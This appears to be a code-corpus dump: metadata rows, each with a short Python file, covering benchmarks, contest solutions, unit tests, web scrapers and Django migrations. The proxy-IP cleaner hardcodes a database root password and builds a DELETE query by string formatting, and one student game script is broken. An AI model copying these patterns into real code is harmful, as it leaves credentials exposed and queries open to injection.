blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
90aeaf2daeadbe22cf82d1503865189d04b0c0b9 | 905a113a02171b1f63beae3701b2e16ff9d6fdc8 | /examples/cache_performance.py | 126339c01359ffcb2c4eab5a35010c057b3fd0c2 | [
"MIT"
] | permissive | oldas1/beem | ff177aa502d96759f448aa85a7b53d689fa5da30 | d0b9642bfe5f5df3004a59d4923ea497e3a944b3 | refs/heads/master | 2022-04-23T05:07:20.532355 | 2020-04-26T22:16:42 | 2020-04-26T22:16:42 | 259,263,705 | 1 | 0 | NOASSERTION | 2020-04-27T09:15:44 | 2020-04-27T09:15:43 | null | UTF-8 | Python | false | false | 2,120 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from datetime import datetime, timedelta
import time
import io
import logging
from beem.blockchain import Blockchain
from beem.block import Block
from beem.steem import Steem
from beem.utils import parse_time, formatTimedelta
from beem.nodelist import NodeList
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def stream_votes(stm, threading, thread_num):
b = Blockchain(steem_instance=stm)
opcount = 0
start_time = time.time()
for op in b.stream(start=23483000, stop=23485000, threading=threading, thread_num=thread_num,
opNames=['vote']):
sys.stdout.write("\r%s" % op['block_num'])
opcount += 1
now = time.time()
total_duration = now - start_time
print(" votes: %d, time %.2f" % (opcount, total_duration))
return opcount, total_duration
if __name__ == "__main__":
node_setup = 1
threading = True
thread_num = 8
timeout = 10
nodes = NodeList()
nodes.update_nodes(weights={"block": 1})
node_list = nodes.get_nodes()[:5]
vote_result = []
duration = []
stm = Steem(node=node_list, timeout=timeout)
b = Blockchain(steem_instance=stm)
block = b.get_current_block()
block.set_cache_auto_clean(False)
opcount, total_duration = stream_votes(stm, threading, thread_num)
print("Finished!")
block.set_cache_auto_clean(True)
cache_len = len(list(block._cache))
start_time = time.time()
block.clear_cache_from_expired_items()
clear_duration = time.time() - start_time
time.sleep(5)
cache_len_after = len(list(block._cache))
start_time = time.time()
print(str(block._cache))
clear_duration2 = time.time() - start_time
print("Results:")
print("%d Threads with https duration: %.2f s - votes: %d" % (thread_num, total_duration, opcount))
print("Clear %d items in %.3f s (%.3f s) (%d remaining)" % (cache_len, clear_duration, clear_duration2, cache_len_after))
| [
"holger@nahrstaedt.de"
] | holger@nahrstaedt.de |
519fb1f5952ab59f10dda6bdb75ef1f9cc40f907 | 4926667354fa1f5c8a93336c4d6e2b9f6630836e | /386.py | d21bb225b2d9bed78f30995e890cbafa6d2da357 | [] | no_license | nascarsayan/lintcode | 343b3f6e7071479f0299dd1dd1d8068cbd7a7d9e | 4da24b9f5f182964a1bdf4beaa8afc17eb7a70f4 | refs/heads/master | 2021-07-13T12:31:45.883179 | 2020-07-20T02:27:53 | 2020-07-20T02:27:53 | 185,825,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from collections import Counter
class Solution:
"""
@param s: A string
@param k: An integer
@return: An integer
"""
def lengthOfLongestSubstringKDistinct(self, s, k):
# write your code here
cnt, size, uniq, mx, st = Counter(), len(s), 0, 0, 0
if size == 0 or k == 0:
return 0
for fl in range(size):
cnt[s[fl]] += 1
if cnt[s[fl]] == 1:
uniq += 1
while (uniq > k):
cnt[s[st]] -= 1
if cnt[s[st]] == 0:
uniq -= 1
st += 1
mx = max(mx, fl - st + 1)
return mx
print(Solution().lengthOfLongestSubstringKDistinct("WORLD", 4))
| [
"nascarsayan@iitkgp.ac.in"
] | nascarsayan@iitkgp.ac.in |
dffc7c9ec4364d54acd835e17b75c92f69201249 | f21452fada48d27d06bbb47dd934043e0f2e3fcf | /tests/algos/torch/test_utility.py | 16773faf5216c73f27814b698b138afd1dae7943 | [
"MIT"
] | permissive | kintatta/d3rl | ff72d794f42af7218df73c2102bc1a56e5cfa688 | 0674c4898927a53f36c5c875d8f217337f22d364 | refs/heads/master | 2022-12-26T05:20:55.280102 | 2020-10-09T14:29:11 | 2020-10-09T14:29:11 | 302,816,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,181 | py | import numpy as np
import torch
import pytest
import copy
from unittest.mock import Mock
from d3rlpy.algos.torch.utility import soft_sync, hard_sync
from d3rlpy.algos.torch.utility import set_eval_mode, set_train_mode
from d3rlpy.algos.torch.utility import freeze, unfreeze
from d3rlpy.algos.torch.utility import torch_api, train_api, eval_api
from d3rlpy.algos.torch.utility import map_location
from d3rlpy.algos.torch.utility import get_state_dict, set_state_dict
from d3rlpy.algos.torch.utility import compute_augemtation_mean
@pytest.mark.parametrize('tau', [0.05])
@pytest.mark.parametrize('input_size', [32])
@pytest.mark.parametrize('output_size', [32])
def test_soft_sync(tau, input_size, output_size):
module = torch.nn.Linear(input_size, output_size)
targ_module = torch.nn.Linear(input_size, output_size)
original = copy.deepcopy(targ_module)
soft_sync(targ_module, module, tau)
module_params = module.parameters()
targ_params = targ_module.parameters()
original_params = original.parameters()
for p, targ_p, orig_p in zip(module_params, targ_params, original_params):
assert torch.allclose(p * tau + orig_p * (1.0 - tau), targ_p)
@pytest.mark.parametrize('input_size', [32])
@pytest.mark.parametrize('output_size', [32])
def test_hard_sync(input_size, output_size):
module = torch.nn.Linear(input_size, output_size)
targ_module = torch.nn.Linear(input_size, output_size)
hard_sync(targ_module, module)
for p, targ_p in zip(module.parameters(), targ_module.parameters()):
assert torch.allclose(targ_p, p)
def test_map_location_with_cpu():
assert map_location('cpu:0') == 'cpu'
def test_map_location_with_cuda():
fn = map_location('cuda:0')
dummy = Mock()
dummy.cuda = Mock()
fn(dummy, '')
dummy.cuda.assert_called_with('cuda:0')
class DummyImpl:
def __init__(self):
self.fc1 = torch.nn.Linear(100, 100)
self.fc2 = torch.nn.Linear(100, 100)
self.optim = torch.optim.Adam(self.fc1.parameters())
self.device = 'cpu:0'
@torch_api
def torch_api_func(self, x):
assert isinstance(x, torch.Tensor)
@train_api
def train_api_func(self):
assert self.fc1.training
assert self.fc2.training
@eval_api
def eval_api_func(self):
assert not self.fc1.training
assert not self.fc2.training
def check_if_same_dict(a, b):
for k, v in a.items():
if isinstance(v, torch.Tensor):
assert (b[k] == v).all()
else:
assert b[k] == v
def test_get_state_dict():
impl = DummyImpl()
state_dict = get_state_dict(impl)
check_if_same_dict(state_dict['fc1'], impl.fc1.state_dict())
check_if_same_dict(state_dict['fc2'], impl.fc2.state_dict())
check_if_same_dict(state_dict['optim'], impl.optim.state_dict())
def test_set_state_dict():
impl1 = DummyImpl()
impl2 = DummyImpl()
impl1.optim.step()
assert not (impl1.fc1.weight == impl2.fc1.weight).all()
assert not (impl1.fc1.bias == impl2.fc1.bias).all()
assert not (impl1.fc2.weight == impl2.fc2.weight).all()
assert not (impl1.fc2.bias == impl2.fc2.bias).all()
chkpt = get_state_dict(impl1)
set_state_dict(impl2, chkpt)
assert (impl1.fc1.weight == impl2.fc1.weight).all()
assert (impl1.fc1.bias == impl2.fc1.bias).all()
assert (impl1.fc2.weight == impl2.fc2.weight).all()
assert (impl1.fc2.bias == impl2.fc2.bias).all()
def test_eval_mode():
impl = DummyImpl()
impl.fc1.train()
impl.fc2.train()
set_eval_mode(impl)
assert not impl.fc1.training
assert not impl.fc2.training
def test_train_mode():
impl = DummyImpl()
impl.fc1.eval()
impl.fc2.eval()
set_train_mode(impl)
assert impl.fc1.training
assert impl.fc2.training
@pytest.mark.skip(reason='no way to test this')
def test_to_cuda():
pass
@pytest.mark.skip(reason='no way to test this')
def test_to_cpu():
pass
def test_freeze():
impl = DummyImpl()
freeze(impl)
for p in impl.fc1.parameters():
assert not p.requires_grad
for p in impl.fc2.parameters():
assert not p.requires_grad
def test_unfreeze():
impl = DummyImpl()
freeze(impl)
unfreeze(impl)
for p in impl.fc1.parameters():
assert p.requires_grad
for p in impl.fc2.parameters():
assert p.requires_grad
def test_compute_augmentation_mean():
class DummyAugmentation:
def __init__(self):
self.n = 1
def transform(self, x):
y = x + self.n
self.n += 1
return y
aug = DummyAugmentation()
def func(x):
return x
x = np.random.random((100, 100))
y = compute_augemtation_mean(aug, 2, func, {'x': x}, 'x')
assert np.allclose(y, x + 1.5)
def test_torch_api():
impl = DummyImpl()
x = np.random.random((100, 100))
impl.torch_api_func(x)
def test_train_api():
impl = DummyImpl()
impl.fc1.eval()
impl.fc2.eval()
impl.train_api_func()
def test_eval_api():
impl = DummyImpl()
impl.fc1.train()
impl.fc2.train()
impl.eval_api_func()
| [
"takuma.seno@gmail.com"
] | takuma.seno@gmail.com |
d3d06096d1defdb26c8a4c8b37f08dd6a66326a9 | 31900bdf5648061a3093230711c5394e20b90436 | /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/resources/hosters/nowvideo.py | ce787e3da4c15042643933229ca18cdc3e5ba3fe | [] | no_license | linuxbox10/enigma2-plugin-extensions-mediaportal | aa6f14ecfc42ce91e22c487070541459a1ab820c | e6b388918c186442718e7200e03c83d0db260831 | refs/heads/master | 2021-05-01T18:50:50.332850 | 2018-02-10T11:33:48 | 2018-02-10T11:33:48 | 121,009,954 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | # -*- coding: utf-8 -*-
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
from Plugins.Extensions.MediaPortal.resources.messageboxext import MessageBoxExt
def nowvideo(self, data, url, ck):
dataPost = {}
r = re.findall('input type="hidden".*?name="(.*?)".*?value="(.*?)"', data, re.S)
if r:
for name, value in r:
dataPost[name] = value
dataPost['submit'] = 'submit'
spezialagent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'
getPage(url, method='POST', agent=spezialagent, cookies=ck, postdata=urlencode(dataPost), headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.nowvideo_postData).addErrback(self.errorload)
else:
self.stream_not_found()
def nowvideo_postData(self, data):
stream_url = re.findall('<source src="(.*?\.mp4)" type=\'video/mp4\'>', data)
if stream_url:
print stream_url
self._callback(stream_url[-1])
else:
self.stream_not_found() | [
"jaysmith940@hotmail.co.uk"
] | jaysmith940@hotmail.co.uk |
12ced604368191dd1c0e6232d77673496d0d2e8e | 41f5fb2b76efe6f7a10c96ff197b0785e247ca12 | /gather/gathered/broward_dbhydro_get_reclen.py | e8dd4e3f83dbf8d3d9fc6b3de457931dcff8f266 | [
"BSD-2-Clause",
"BSD-Advertising-Acknowledgement"
] | permissive | jtwhite79/my_python_junk | 2f33d102e0e2875cf617b11dc31127678e9e9756 | 2ee0044f9b455d40e3b1967081aa7ac2dbfa64c9 | refs/heads/master | 2021-01-23T05:45:21.432421 | 2014-07-01T17:30:40 | 2014-07-01T17:30:40 | 4,587,435 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | import os
import pestUtil as pu
import dbhydro_util
stg_dir = 'SW\\STG\\'
stg_files = os.listdir(stg_dir)
nrecs = 0
for file in stg_files:
#dbhydro_util.load_series(stg_dir+file)
#smp = pu.smp(stg_dir+file,load=True)
f = open(stg_dir+file,'r')
for line in f:
nrecs += 1
f.close()
print nrecs | [
"jtwhite79@yahoo.com"
] | jtwhite79@yahoo.com |
d0d3f1cddb1938eaf9cec4e4ac808a6f018b3dbc | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Data Structures/Advanced Data Structures/Segment Trees/Binary Modulo (P2SME)/test.py | 38cf14c43973f5afa31a8065faaa7db712143015 | [
"MIT"
] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 657 | py | import io
import unittest
from contextlib import redirect_stdout
from unittest.mock import patch
class TestQ(unittest.TestCase):
@patch('sys.stdin.readline', side_effect=[
'1',
'01010101',
'5',
'0 1 3',
'1 2 1',
'0 2 5',
'1 3 1',
'0 0 7',
])
def test_case_0(self, input_mock=None):
text_trap = io.StringIO()
with redirect_stdout(text_trap):
import solution
self.assertEqual(text_trap.getvalue(),
'0\n' +
'3\n' +
'2\n')
if __name__ == '__main__':
unittest.main()
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
ff08e3a26e3fa26128b8e411866fcd197ff044bd | b33ad1c8560fc22a7e4ae9dec7f3c778b70941fa | /abc148/d.py | 14f317ce9ff9e5e018c034d644fb0d879fbef9bc | [] | no_license | Tommy-somen/atcoder_record | 36f226ffe6465dd5f8ae4986195510d00da46ffb | 0e549a72cec3b87accefc52d5cd56420251361b9 | refs/heads/master | 2023-08-16T10:23:39.609512 | 2021-09-27T11:38:57 | 2021-09-27T11:38:57 | 410,585,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | n = int(input())
a = list(map(int,input().split()))
inx,cnt = 1,0
for i in range(n):
if a[i] != inx:
cnt += 1
else:
inx += 1
if n == cnt:
print(-1)
else:
print(cnt)
| [
"tomohiro1015w@gmail.com"
] | tomohiro1015w@gmail.com |
071da57b138d2467b16c09c78c676eae75380f31 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5706278382862336_1/Python/ashashwat/1.py | 302bf631a7f5094ce06dd7172c1f76cddcd563ad | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
from collections import defaultdict
from math import factorial as f
from fractions import gcd as g
from fractions import Fraction as F
import math
T = int (raw_input ())
for t in range (1, T + 1):
a, b = [int (i) for i in raw_input ().split ('/')]
x = F (a, b)
ret = 0
cnt = 1
for i in range (100005):
if F (cnt * a, b) >= F (1, 1):
break
ret += 1
cnt *= 2
if x.denominator != 2 ** int (math.log (x.denominator, 2)): ret = -1
if ret != -1: print ("Case #{0}: {1}".format (t, ret))
else: print ("Case #{0}: impossible".format (t))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
b17624f67c8834b65ec80699a3b2dde49b37c721 | cd77df7e0adf69f78cd86e0b09ffeba7acd7e1ba | /utilspy/diff.py | 184e637a7b20471b9bf5db2d6674cc8dc2076d0f | [] | no_license | huletlab/apparatus3-seq | 963b6ded59f53ae6ad714569559fe6f2cd08b610 | 3520f243c1d6d47dcf126cd4aa9e0f6cdaf2fb9a | refs/heads/master | 2021-01-25T04:53:00.095687 | 2014-02-21T04:42:41 | 2014-02-21T04:42:41 | 3,621,818 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | import numpy
y1= numpy.fromfile('L:/software/apparatus3/seq/seqstxt/before_before.txt',dtype=float, sep=',')
y2= numpy.fromfile('L:/software/apparatus3/seq/seqstxt/before.txt',dtype=float, sep=',')
print y1.size, y2.size
f1 = open('L:/software/apparatus3/seq/seqstxt/before_before.txt','r')
f2 = open('L:/software/apparatus3/seq/seqstxt/before.txt','r')
fout = open('L:/software/apparatus3/seq/seqstxt/diffout.txt','w')
nchar=0
while 1:
char1 = f1.read(1)
char2 = f2.read(1)
fout.write(char1)
nchar = nchar + 1
if not char1: break
if char1 != char2:
print str(nchar), char1,char2
print f1.read(1)+f1.read(1)+f1.read(1)+f1.read(1)+f1.read(1)+f1.read(1)+f1.read(1)+f1.read(1)
break
f1.close()
f2.close()
fout.close()
| [
"pmd323@gmail.com"
] | pmd323@gmail.com |
9f66cea721ed94503a91abf4e5c2522493626856 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/279/104634/submittedfiles/testes.py | 53b97a94b5771c022b839733178b493b365d624b | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
import random
a=0
resultado='S'
escolha=['X','O']
imagem=[[' ',' ',' '],[' ',' ',' '],[' ',' ',' ']]
posicao=[['00','01','02'],['10','11','12'],['20','21','22']]
while(True):
simbolo=(input('Qual simbolo deseja utilizar ? '))
if simbolo=='X' or simbolo=='O':
break
else :
print('Digite X ou O ')
sorteio=random.choice(escolha)
print(sorteio)
while(True):
if sorteio==simbolo :
while(True):
jogada=(int(input('Qual sua jogada ')))
for i in range (0,3,1):
for j in range (0,3,1):
if jogada==posicao[i][j] :
if imagem[i][j]==" " :
a=a+1
break
if sorteio=='O' :
sorteio='X'
else:
sorteio='O'
break
else:
while(True) :
jogada=random.choice(random.choice(posicao))
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
36954674c2332ab102d6485a7b8bd1c425885caa | 55faff05d101b7dc0a46669c3f8f2ae8e65d4ada | /hypnobox/migrations/0002_auto_20160909_1835.py | 869565d6f3ff28c8174c4217997b7c472317bd38 | [
"MIT"
] | permissive | fgmacedo/hypnobox-django | e1e81277b0e7ebc8b98b242b006d1148169ee88a | 6e4a5c4d1ec4c8b8931e6da91efb3a82320ca648 | refs/heads/develop | 2023-01-06T22:10:35.240230 | 2016-11-21T19:37:50 | 2016-11-21T19:37:50 | 67,744,850 | 0 | 0 | MIT | 2022-12-26T20:29:21 | 2016-09-08T22:30:01 | Python | UTF-8 | Python | false | false | 594 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-09-09 21:35
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hypnobox', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='lead',
name='phone_number',
field=models.CharField(max_length=9, validators=[django.core.validators.RegexValidator('^[\\d\\-]+$', message='Only numbers.')], verbose_name='phone number'),
),
]
| [
"fgmacedo@gmail.com"
] | fgmacedo@gmail.com |
532bd882071670d5c3b497865fb66647b7960f75 | bb71c03639010a22688a2955d6cd80ce3bf51a88 | /menu/migrations/0003_auto_20180918_1130.py | 895a760633b46be57554ed886e943970dd2a77f5 | [] | no_license | jhoover4/improve-a-django-project | 217732cf50eb48915b2566d657e67cd89551c5af | a9b35e708ca0fc72b4b7ee696631c233a718d820 | refs/heads/master | 2020-03-28T07:09:52.763927 | 2018-09-19T17:21:42 | 2018-09-21T02:36:42 | 147,884,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2018-09-18 18:30
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
def update_expired_date(apps, schema_editor):
Menu = apps.get_model('menu', 'Menu')
for menu in Menu.objects.all():
try:
menu.expiration_date = datetime.datetime.strftime(menu.expiration_date, "%Y-%m-%d")
except TypeError:
menu.expiration_date = None
menu.save()
class Migration(migrations.Migration):
dependencies = [
('menu', '0002_auto_20160406_1554'),
]
operations = [
migrations.AlterField(
model_name='item',
name='ingredients',
field=models.ManyToManyField(related_name='ingredients', to='menu.Ingredient'),
),
migrations.AlterField(
model_name='menu',
name='expiration_date',
field=models.DateField(blank=True, help_text='MM/DD/YYYY', null=True),
),
migrations.RunPython(update_expired_date),
]
| [
"jordan@hoovermld.com"
] | jordan@hoovermld.com |
8f7e3dc695f84d0a4697961f552a156a71ee55ad | 536538af28cfe40e10ff1ce469cd0f81e8b3a8fe | /binary_tree_zigzag_level_order_traversal.py | 347c5f2fa6f17ff8536a1eba3ab6e897881a62d2 | [] | no_license | ShunKaiZhang/LeetCode | 7e10bb4927ba8581a3a7dec39171eb821c258c34 | ede2a2e19f27ef4adf6e57d6692216b8990cf62b | refs/heads/master | 2021-09-01T07:41:03.255469 | 2017-12-25T19:22:18 | 2017-12-25T19:22:18 | 104,136,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,253 | py | # python3
# Given a binary tree, return the zigzag level order traversal of its nodes' values.
# (ie, from left to right, then right to left for the next level and alternate between).
# For example:
# Given binary tree [3,9,20,null,null,15,7],
# 3
# / \
# 9 20
# / \
# 15 7
# return its zigzag level order traversal as:
# [
# [3],
# [20,9],
# [15,7]
# ]
# My solution
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def zigzagLevelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
out = []
def search(root, level):
if root is None:
return
if len(out) == level:
out.append([root.val])
else:
out[level].append(root.val)
search(root.left, level + 1)
search(root.right, level + 1)
return
search(root, 0)
for i in range(len(out)):
if i % 2 == 1:
out[i] = out[i][::-1]
return out
| [
"noreply@github.com"
] | ShunKaiZhang.noreply@github.com |
c8bb87201dfc25e8bc7419858495d30883748a4e | 768a6a9db5b2824f1e895b8b8e8047294806e80a | /Spider/Spider/tools/ip_clean.py | 94ee9c4afd45c8edcae74b7ed9d56b5fd20541ce | [] | no_license | heqiang/SearchEngine | 8ffb974ba33aa9ccc306de1caf4e7a3c5f4ca0ad | ccaa17d350fb34a0b0e984951bd8d82588f0a181 | refs/heads/master | 2023-05-28T13:05:34.568652 | 2022-03-10T07:46:13 | 2022-03-10T07:46:13 | 192,917,599 | 1 | 0 | null | 2023-05-22T22:17:35 | 2019-06-20T12:39:01 | Python | UTF-8 | Python | false | false | 1,508 | py | import pymysql
from fake_useragent import UserAgent
import requests
import threading
# import ThreadClass
conn=pymysql.connect(
host='localhost',
user='root',
password='1422127065',
db='bishe',
charset='utf8'
)
cursor=conn.cursor()
ua=UserAgent()
def delete(ip):
print("-|开始删除无用ip:{0}".format(ip))
delete_sql = 'delete from proxy_ip where ip="{0}"'.format(ip)
cursor.execute(delete_sql)
conn.commit()
return True
def jundge_ip(ip, port, category):
print("开始判断ip:{}".format(ip))
http_url = "https://www.baidu.com/"
proxy_url = "{0}://{1}:{2}".format(category, ip, port)
try:
proxy_dict = {
"http": proxy_url,
"https": proxy_url
}
res = requests.get(http_url, proxies=proxy_dict, timeout=3)
except Exception as e:
delete(ip)
return False
else:
code = res.status_code
if code == 200:
print("-|可用ip:{0}".format(ip))
return True
else:
print("-|不可用ip:{0}".format(ip))
delete(ip)
def clean_ip():
get_all_ip="select ip,port,category from proxy_ip "
result=cursor.execute(get_all_ip)
for res in cursor.fetchall():
ip = res[0]
port = res[1]
category = res[2]
# return ip,port,category
jundge_ip(ip, port, category)
# threads=[]
# clean_ip_threading=threading.Thread(target=clean_ip)
if __name__ == '__main__':
clean_ip() | [
"1422127065@qq.com"
] | 1422127065@qq.com |
bc7ad473abe58d55e81ef30ef051d12a3b8cd654 | 338c1ed5683f2195d86cab0cab521b95efd8cae8 | /easy/query_board.py | 44a9c550707f9cec6137c0bf74f63b6134863cca | [] | no_license | michaelrbock/codeeval | 59c1a7f531d8fdaeb609f269c1f3f93732825ec5 | 6239aaff776fad98971d40b00940bff60fb255c8 | refs/heads/master | 2020-05-04T22:26:29.937075 | 2014-07-26T19:03:01 | 2014-07-26T19:03:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | import sys
# read in from file
input = open(sys.argv[1], 'r')
lines = []
for line in input:
lines.append(line.strip())
input.close()
board = []
for i in xrange(256):
board.append([0]*256)
for i, line in enumerate(lines):
command = line.split()
if command[0] == 'SetRow':
for j in xrange(256):
board[int(command[1])][j] = int(command[2])
elif command[0] == 'SetCol':
for j in xrange(256):
board[j][int(command[1])] = int(command[2])
elif command[0] == 'QueryRow':
sum = 0
for j in xrange(256):
sum += board[int(command[1])][j]
sys.stdout.write(str(sum))
if i != len(lines) - 1:
sys.stdout.write('\n')
elif command[0] == 'QueryCol':
sum = 0
for j in xrange(256):
sum += board[j][int(command[1])]
sys.stdout.write(str(sum))
if i != len(lines) - 1:
sys.stdout.write('\n')
| [
"mykel.bock@gmail.com"
] | mykel.bock@gmail.com |
d8c9abd59b7dc3024979c75851ef7bea79ed60de | 7620ded9ed5281d3d291972e908116168d03964f | /gram/migrations/0005_editor_bio.py | 6cd8819e795190f844390d4a5d6b4936f48b198d | [] | no_license | vincentmuya/the-gram | bd7da7e3e717101cfac72b1943dc198694d87527 | fa82a0ceb2aeb196ef420e5175e656fba0eda958 | refs/heads/master | 2021-01-25T13:17:17.195984 | 2018-03-14T11:42:01 | 2018-03-14T11:42:01 | 123,543,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-05 07:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gram', '0004_auto_20180305_0001'),
]
operations = [
migrations.AddField(
model_name='editor',
name='bio',
field=models.CharField(max_length=50, null=True),
),
]
| [
"vincentmuya13@gmail.com"
] | vincentmuya13@gmail.com |
7771c610ac7b1f571f35e1ba919e376887bf8d68 | c51eef37bb983a9c35635c7ccc96a0cf689a7438 | /sites/naver_finance/12_parse_bps.py | 93ac1878afb03ecae05b2298dbefd3fe31e7a43d | [] | no_license | Kyeongrok/python_crawler | 0a717b43be36584af1b0f7c1ad0c79108a5d11e0 | 5a5da8af7bb080f752a9a066741ac8adab136a3a | refs/heads/master | 2022-09-13T03:15:08.053639 | 2022-08-02T15:45:03 | 2022-08-02T15:45:03 | 124,719,435 | 40 | 34 | null | 2019-02-27T08:29:52 | 2018-03-11T03:20:32 | HTML | UTF-8 | Python | false | false | 2,685 | py | from libs.crawler import crawl
from bs4 import BeautifulSoup
import requests, re
'''
1.매출액-시총 >=0
2.(영업이익*10)배 - 시총 >=0
3.bps >=0 --- 0
4.bps-현재가 >=0 --- 0
5.(유보율:부채비율 = 5:1)<= 20%
6.이익잉여금 >=0
7.이익잉여금-시총 >=0
8.영업이익증가율 >=0
9.per <=10
10.roe >=0
11.roa >=0
12.pbr <=1
13.eps >=0
'''
url = 'https://finance.naver.com/item/main.nhn?code=005930'
# string = crawl(url)
# open('005930.html', 'w+').write(requests.get(url).text)
string = open('target_site_file/005930.html', encoding='utf-8').read()
replace_space = lambda x: re.sub("(\n|\t|\\xa0|,)", "", x)
def parse(string):
bsobj = BeautifulSoup(string, 'html.parser')
aside = bsobj.find('div', {'id':'aside'})
tab_con1 = aside.find('div', {'id':'tab_con1'})
pbr = 0
bps = 0
price_today = 0
sales = 0
net_income = 0
market_cap = 0
operating_profit = 0
# 최근 연간 매출
cop_analysis = bsobj.find('div', {'class':'section cop_analysis'})
tr_t_line = cop_analysis.find('thead').find_all('tr')[1].find_all('th')[2].text
last_year = replace_space(tr_t_line)
tbody_trs = cop_analysis.find('tbody').find_all('tr')
tbody_first_tr_tds = tbody_trs[0].find_all('td')
tbody_second_tr_tds = tbody_trs[1].find_all('td')
tbody_third_tr_tds = tbody_trs[2].find_all('td')
sales = float(replace_space(tbody_first_tr_tds[2].text))
# operating profit 영업이익
operating_profit = float(replace_space(tbody_second_tr_tds[2].text))
# 당기순이익
net_income = float(replace_space(tbody_third_tr_tds[2].text))
# 시가총액
div_first_tbody_trs = tab_con1.find('div', {'class':'first'}).find_all('tr')
market_cap = re.sub('(\t|\n)','',div_first_tbody_trs[0].find('td').text)
print(market_cap)
# 현재가sdf
try:
price_today = bsobj.find('p', {'class':'no_today'}).find('span', {'class':'blind'}).text.replace(',','')
price_today = float(price_today)
except Exception as e:
print(e)
try:
per_table = tab_con1.find('table', {'class': 'per_table'})
per_table_trs = per_table.find_all('tr')
ems = per_table_trs[2].find_all('em')
pbr = float(ems[0].text)
bps = float(ems[1].text.replace(',', ''))
except Exception as e:
print(e)
# 전년도 매출
return {'price_today':price_today, 'bps':bps, 'pbr':pbr, 'bps_minus_today_price':bps - price_today,
'sales{}'.format(last_year):sales*pow(10, 8), 'operating_profit{}'.format(last_year):
operating_profit * pow(10, 8), 'net_income':net_income * pow(10, 8)}
print(parse(string)) | [
"oceanfog1@gmail.com"
] | oceanfog1@gmail.com |
